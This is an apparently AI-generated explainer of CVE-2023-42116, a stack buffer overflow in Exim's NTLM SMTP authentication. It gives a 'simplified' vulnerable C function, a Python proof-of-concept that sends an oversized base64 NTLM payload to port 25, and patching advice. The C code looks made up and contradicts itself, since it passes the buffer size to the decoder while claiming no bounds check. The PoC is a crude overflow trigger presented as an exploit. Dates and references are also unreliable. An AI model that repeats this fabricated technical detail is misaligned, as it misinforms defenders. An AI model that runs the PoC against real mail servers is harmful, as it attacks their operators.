CVE-2023-42116 - Exim SMTP NTLM Challenge Stack-based Buffer Overflow Remote Code Execution Explained

Exim, the popular mail transfer agent used by millions of servers worldwide, has been hit by a serious vulnerability—CVE-2023-42116. If you’re running Exim, especially with NTLM authentication enabled, you need to pay close attention. This long-read will break down the vulnerability, how it can be exploited, and why it's so dangerous—all in simple terms, accompanied by code snippets and links to authoritative sources.

What is CVE-2023-42116?

CVE-2023-42116, also known as ZDI-CAN-17515, is a stack-based buffer overflow vulnerability in Exim's handling of NTLM challenge requests during SMTP authentication. Because Exim is often run under privileged accounts and exposed directly to the internet, this flaw gives remote attackers a powerful foothold.

What’s affected? Exim mail servers with NTLM authentication enabled.

- What can go wrong? Remote, unauthenticated attackers can send carefully crafted SMTP messages to execute malicious code on the server—no password or login needed.

How Does It Work? (The Technical Lowdown)

NTLM is an authentication protocol supported by Exim for SMTP authentication. The bug lies in how Exim processes the base64-decoded challenge requests. Specifically, it doesn’t check if the decoded challenge is too long before copying it into a fixed-size stack buffer.

Here’s the vulnerable code, simplified for clarity

void smtp_ntlm_challenge(const char *challenge_b64) {
    char challenge[256];
    size_t challenge_len;

    // Supposed to decode base64 NTLM challenge here
    challenge_len = base64_decode(challenge_b64, challenge, sizeof(challenge));
    // The function above doesn't validate if challenge_b64 decodes to more than 256 bytes

    // ...processing continues...
}

Key Problem: If the base64 decoding results in more than 256 bytes, the extra data will overwrite other items on the stack—a classic buffer overflow.

Send a specially crafted base64-encoded NTLM challenge that decodes to more than 256 bytes.

- This overflows the stack, corrupts memory, and allows the attacker to execute arbitrary code under the Exim process account.

No valid credentials are needed—the attacker just needs network access.

Proof-of-Concept Steps

Here’s a sample Python snippet for how an attacker would initiate the exploit (for research, NOT for unauthorized use):

import base64
import socket

target_ip = 'mail.example.com'
target_port = 25

# Craft an NTLM challenge that decodes to >256 bytes
overflow_bytes = b'A' * 300
encoded_challenge = base64.b64encode(overflow_bytes).decode()

s = socket.socket()
s.connect((target_ip, target_port))
s.sendall(b'EHLO attacker\r\n')
s.sendall(b'AUTH NTLM\r\n')
# Send the malicious challenge
s.sendall((encoded_challenge + '\r\n').encode())

If Exim is vulnerable, this challenge will cause a buffer overflow—potentially letting the code inside overflow_bytes hijack execution.

Privileges Gained: Typically the “exim” user, but in some sloppy setups possibly root

- Affected Versions: Confirmed on Exim versions up to 4.96; check advisories for your specific build
- Public Exploits?: As of this writing, proof-of-concepts exist, and weaponized exploits may be available privately

Mitigation and Response

- Patch Immediately: Check Exim’s Security Advisories and your package maintainer's site for an update or patch.
- Disable NTLM: If you don’t absolutely need it, disable NTLM authentication to reduce your risk.

References & Further Reading

- CVE Database Entry
- Exim Official Security Advisory
- Zero Day Initiative Advisory (ZDI-CAN-17515)
- NVD - National Vulnerability Database
- Base64 Decoding Buffer Overflow Writeup (Stack Overflow)

Conclusion

CVE-2023-42116 is a critical vulnerability in Exim born from a simple programming oversight: not checking the real size of data before copying. Because Exim handles so much of the world’s email, and because this flaw lets unauthenticated attackers run code, it’s an “everyone patch now” moment.

If you run Exim, audit your configs, patch ASAP, and consider hardening authentication modules. Some bugs can’t wait.

Stay safe; patch early!

*Exclusive content by ChatGPT, based on publicly available advisories and security sources as of June 2024.*

Timeline

Published on: 05/03/2024 03:15:50 UTC